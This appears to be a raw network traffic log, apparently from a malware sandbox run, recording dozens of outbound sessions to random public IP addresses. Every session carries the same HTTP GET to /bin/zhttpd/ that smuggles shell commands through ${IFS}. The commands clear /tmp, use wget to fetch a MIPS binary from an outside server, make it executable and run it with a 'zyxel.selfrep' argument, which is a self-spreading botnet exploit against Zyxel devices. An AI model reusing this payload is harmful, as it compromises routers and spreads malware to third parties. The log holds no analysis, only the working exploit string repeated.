                                            Jan 14, 2024 15:50:47.591718912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6469192.168.2.2355522220.100.117.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591751099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6470192.168.2.2338090120.66.117.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591782093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6471192.168.2.2351042145.156.178.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591808081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6472192.168.2.233482253.182.150.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591845036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6473192.168.2.2351972164.19.237.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591847897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6474192.168.2.2340406209.232.101.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591918945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6475192.168.2.2337424118.172.233.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591918945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6476192.168.2.234081671.192.92.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591955900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6477192.168.2.2351118153.41.221.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591990948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6478192.168.2.2351172218.248.207.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592008114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6479192.168.2.2349390145.209.181.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592036009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6480192.168.2.2335598129.244.16.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592077017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6481192.168.2.2351072160.205.71.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592118979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6482192.168.2.2358810173.211.11.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592150927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6483192.168.2.23588042.56.49.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592175007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6484192.168.2.234587688.86.20.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592206001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6485192.168.2.2343244171.128.185.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592246056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6486192.168.2.233323645.201.150.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592269897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6487192.168.2.2356236156.71.127.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592305899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6488192.168.2.235372842.7.38.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592324972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6489192.168.2.2342044125.86.247.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592359066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6490192.168.2.2351940161.11.250.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592392921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6491192.168.2.233797072.86.74.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592428923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6492192.168.2.233682617.206.155.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592459917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6493192.168.2.2356514153.187.117.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592463017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6494192.168.2.2337840101.118.59.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592499971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6495192.168.2.235105223.173.162.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592530966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6496192.168.2.234587465.249.4.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592572927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6497192.168.2.2342492115.213.204.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592595100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6498192.168.2.2356862174.111.135.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592595100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6499192.168.2.2353268158.143.216.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592634916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6500192.168.2.235201083.48.83.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592668056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6501192.168.2.2347346187.90.6.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592696905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6502192.168.2.2352490105.92.208.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592717886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6503192.168.2.234155266.31.17.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592741013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6504192.168.2.2355324183.32.179.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592782021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6505192.168.2.2348230159.58.82.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592828989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6506192.168.2.2339712179.86.125.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592858076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6507192.168.2.233890814.202.43.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592861891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6508192.168.2.2338696136.36.244.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592906952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6509192.168.2.2333672151.94.56.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592936039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6510192.168.2.233842853.157.232.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592948914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6511192.168.2.2353698213.109.146.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.592964888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6512192.168.2.233905665.39.2.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593031883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6513192.168.2.2335930149.116.55.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593069077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6514192.168.2.2360940220.155.48.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593092918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6515192.168.2.235918299.150.37.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593122005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6516192.168.2.234557896.211.24.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593137980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6517192.168.2.2356732217.44.174.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593183041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6518192.168.2.2344954111.183.160.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593230963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6519192.168.2.2336962184.152.168.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593252897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6520192.168.2.235772863.131.237.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593280077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6521192.168.2.235339872.85.174.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593305111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6522192.168.2.2335372154.174.183.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593343973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6523192.168.2.2345446177.187.96.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593389034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6524192.168.2.2355152140.137.220.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593419075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6525192.168.2.2345536187.180.180.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593440056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6526192.168.2.234867084.236.40.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593480110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6527192.168.2.235110479.218.255.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593518972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6528192.168.2.2342696219.212.139.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593558073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6529192.168.2.2335680134.191.149.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593578100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6530192.168.2.2345786164.241.96.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.593606949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6531192.168.2.234462814.152.233.236443
                                            TimestampBytes transferredDirectionData
